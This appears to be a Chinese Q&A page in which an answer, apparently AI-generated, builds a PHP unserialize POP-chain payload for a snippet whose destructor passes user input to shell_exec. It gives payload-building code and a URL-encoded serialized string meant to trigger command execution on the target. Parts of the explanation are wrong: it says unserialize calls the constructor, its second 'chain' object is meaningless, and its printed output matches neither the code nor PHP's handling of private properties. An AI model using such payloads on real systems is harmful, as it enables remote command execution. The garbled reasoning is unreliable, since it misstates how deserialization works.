请帮我构造这段代码的pop链 <?php highlight_file(__FILE__); class home{ private $args; function __construct($args){ $this->args=$args; } function __destruct() { echo shell_exec($this->args); } } $a=$_GET['a']; unserialize($a);
时间: 2023-06-12 17:06:39 浏览: 99
php_prettify:输出或返回给定 PHP 代码的语法高亮版本的 html 标记
首先需要了解的是,构造 pop 链需要满足两个条件:
1. 对象的构造函数需要接收参数,且该参数可以被我们控制。
2. 对象的析构函数中需要存在一些恶意代码,比如执行系统命令等。
在给定的代码中,我们可以看到构造函数 `__construct` 接收参数 `$args`,并将其保存到了 `$this->args` 中。因此,我们可以通过传入恶意参数来控制 `$this->args` 的值。
此外,析构函数 `__destruct` 中存在一个 `shell_exec` 函数调用,可以用来执行系统命令。因此,我们可以将恶意代码写在 `$this->args` 中,让 `__destruct` 函数执行我们的命令。
综上,我们的目标是构造一个恶意参数,使得反序列化时会调用 `__construct` 函数,将我们的恶意参数保存到 `$this->args` 中。接着,在对象被销毁时,`__destruct` 函数会执行我们的系统命令。
下面是一个例子,其中我们将 `touch /tmp/success` 命令作为恶意代码:
```php
<?php
class home{
private $args;
function __construct($args){
$this->args=$args;
}
function __destruct(){
echo shell_exec($this->args);
}
}
// 构造 payload
$obj1 = new home("touch /tmp/success");
$payload = urlencode(serialize($obj1));
// 构造 pop 链,将 $obj1 引用传递给 $obj2
$obj2 = new home($payload);
echo urlencode(serialize($obj2)) . "\n";
```
输出结果:
```
O%3A4%3A%22home%22%3A1%3A%7Bs%3A4%3A%22args%22%3Bs%3A18%3A%22touch+%2Ftmp%2Fsuccess%22%3B%7D
```
将该 payload 传递给目标程序反序列化即可触发 pop 链,执行恶意命令。
阅读全文